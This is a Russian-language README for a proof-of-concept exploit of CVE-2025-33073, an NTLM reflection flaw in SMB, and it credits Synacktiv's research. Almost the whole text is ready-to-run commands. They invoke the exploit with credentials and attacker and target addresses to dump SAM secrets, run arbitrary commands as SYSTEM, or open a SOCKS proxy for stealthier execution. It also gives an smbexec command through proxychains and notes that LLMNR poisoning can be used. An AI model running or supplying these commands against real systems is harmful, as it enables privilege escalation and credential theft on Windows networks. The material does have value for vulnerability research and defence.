
PoC-эксплойт для уязвимости отражения NTLM в SMB.
PoC-эксплойт для уязвимости NTLM reflection в SMB.
Все заслуги принадлежат официальному исследованию:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
ОС: Kali Linux (большинство пакетов уже предустановлено).
GUI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

CLI
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Пользовательская команда
Вместо запуска secretsdump может быть выполнена пользовательская команда.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS
Для более скрытного выполнения команд после установления валидного соединения от имени SYSTEM. Здесь --target и --target-ip должны совпадать.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
Также через proxychains можно выполнить пользовательскую команду вместо дампа SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Если вы находитесь в том же широковещательном домене, что и устройство, и оно уязвимо к отравлению LLMNR, можно эксплуатировать устройство без необходимости регистрировать DNS-запись.

Выполняется локальная NTLM-аутентификация

Локальная NTLM-аутентификация не выполняется, что приводит к неудачной попытке (FAILED)
